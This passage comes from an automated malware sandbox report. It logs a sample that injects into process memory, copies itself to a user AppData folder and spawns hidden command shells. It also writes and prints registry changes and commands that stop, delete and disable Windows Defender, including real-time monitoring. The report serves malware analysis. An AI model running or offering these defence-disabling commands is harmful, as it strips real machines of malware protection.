ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x400000, size = 512 True 1
Fn
Data
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x43c000, size = 512 True 1
Fn
Data
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x401000, size = 239104 True 1
Fn
Data
Modify Memory #9: c:\programdata\oyvgkgw.exe 0x89c address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Control Flow #9: c:\programdata\oyvgkgw.exe 0x89c os_tid = 0x708, address = 0x77bf01c4 True 1
Fn
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
False
c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe 328.05 KB MD5: cbe11e9a9e71737f15e8f1c606ad8d8c
SHA1: 2d4575457d337753a57b7941d13ac9665342641a
SHA256: 6e143481553f9ae7566d2245450f6fe65734b465df03e43905f0fb19f812b343
False
Host Behavior
File (3)
»
Operation Filename Additional Information Success Count Logfile
Create C:\ProgramData\FAQ desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create Directory C:\Users\kFT6uTQW\AppData\Roaming\tarutils - True 1
Fn
Copy C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe source_filename = C:\ProgramData\oyvGkGw.exe True 1
Fn
Registry (4)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications - False 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender value_name = DisableAntiSpyware, size = 4, type = REG_DWORD_LITTLE_ENDIAN False 1
Fn
Write Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications value_name = DisableNotifications, size = 4, type = REG_DWORD_LITTLE_ENDIAN False 1
Fn
Process (3)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\system32\cmd.exe os_pid = 0x13c, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0x77c, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Windows\system32\cmd.exe os_pid = 0x648, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Module (6)
»
Operation Module Additional Information Success Count Logfile
Load shell32.dll base_address = 0x76480000 True 1
Fn
Load ntdll.dll base_address = 0x77be0000 True 1
Fn
Load shlwapi.dll base_address = 0x773c0000 True 1
Fn
Load advapi32.dll base_address = 0x77740000 True 1
Fn
Load ole32.dll base_address = 0x75be0000 True 1
Fn
Get Filename - process_name = c:\programdata\oyvgkgw.exe, file_name_orig = C:\ProgramData\oyvGkGw.exe, size = 260 True 1
Fn
Service (3)
»
Operation Additional Information Success Count Logfile
Get Info service_name = WinDefend True 1
Fn
Open database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
Fn
System (5)
»
Operation Additional Information Success Count Logfile
Sleep duration = 500 milliseconds (0.500 seconds) True 2
Fn
Get Info type = Hardware Information True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Process #15: cmd.exe
56 0
»
Information Value
ID #15
File Name c:\windows\syswow64\cmd.exe
Command Line /c sc stop WinDefend
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:40, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:28
OS Process Information
»
Information Value
PID 0x13c
Parent PID 0x62c (c:\programdata\oyvgkgw.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 530
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable True False False -
private_0x00000000000d0000 0x000d0000 0x0010ffff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x0020ffff Private Memory Readable, Writable True False False -
locale.nls 0x00210000 0x00276fff Memory Mapped File Readable False False False -
private_0x0000000000350000 0x00350000 0x0035ffff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x0047ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000480000 0x00480000 0x00607fff Pagefile Backed Memory Readable True False False -
private_0x0000000000670000 0x00670000 0x0076ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000770000 0x00770000 0x008f0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000900000 0x00900000 0x01cfffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001d00000 0x01d00000 0x02042fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x4a680000 0x4a6cbfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75620000 0x75626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (10)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a680000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75fb0000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x75fda84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x75fe3b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75fc4a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x75fda79d True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-06-25 14:54:40 (UTC) True 1
Fn
Get Time type = Ticks, time = 269070 True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 7
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000005 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #16: cmd.exe
56 0
»
Information Value
ID #16
File Name c:\windows\syswow64\cmd.exe
Command Line /c sc delete WinDefend
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:40, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:28
OS Process Information
»
Information Value
PID 0x77c
Parent PID 0x62c (c:\programdata\oyvgkgw.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x DC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0032ffff Private Memory Readable, Writable True False False -
private_0x0000000000340000 0x00340000 0x0043ffff Private Memory Readable, Writable True False False -
private_0x00000000005a0000 0x005a0000 0x0061ffff Private Memory Readable, Writable True False False -
private_0x0000000000780000 0x00780000 0x0087ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000880000 0x00880000 0x00a07fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a10000 0x00a10000 0x00b90fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000ba0000 0x00ba0000 0x01f9ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001fa0000 0x01fa0000 0x022e2fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x4a680000 0x4a6cbfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75620000 0x75626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (10)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 5
Fn
Open STD_INPUT_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\cmd.exe base_address = 0x4a680000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75fb0000 True 2
Fn
Get Filename - process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadUILanguage, address_out = 0x75fda84f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileExW, address_out = 0x75fe3b92 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75fc4a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x75fda79d True 1
Fn
System (2)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2018-06-25 14:54:40 (UTC) True 1
Fn
Get Time type = Ticks, time = 269086 True 1
Fn
Environment (19)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 7
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 2
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Set Environment String name = =ExitCode, value = 00000005 True 1
Fn
Set Environment String name = =ExitCodeAscii True 1
Fn
Process #17: cmd.exe
55 0
»
Information Value
ID #17
File Name c:\windows\syswow64\cmd.exe
Command Line /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:40, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:28
OS Process Information
»
Information Value
PID 0x648
Parent PID 0x62c (c:\programdata\oyvgkgw.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 250
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000210000 0x00210000 0x0024ffff Private Memory Readable, Writable True False False -
private_0x00000000002c0000 0x002c0000 0x003bffff Private Memory Readable, Writable True False False -
private_0x00000000004f0000 0x004f0000 0x004fffff Private Memory Readable, Writable True False False -
private_0x00000000005b0000 0x005b0000 0x0062ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000630000 0x00630000 0x007b7fff Pagefile Backed Memory Readable True False False -
private_0x0000000000820000 0x00820000 0x0091ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000920000 0x00920000 0x00aa0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000ab0000 0x00ab0000 0x01eaffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001eb0000 0x01eb0000 0x021f2fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x4a680000 0x4a6cbfff Memory Mapped File Readable, Writable, Executable True False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
winbrand.dll 0x75620000 0x75626fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
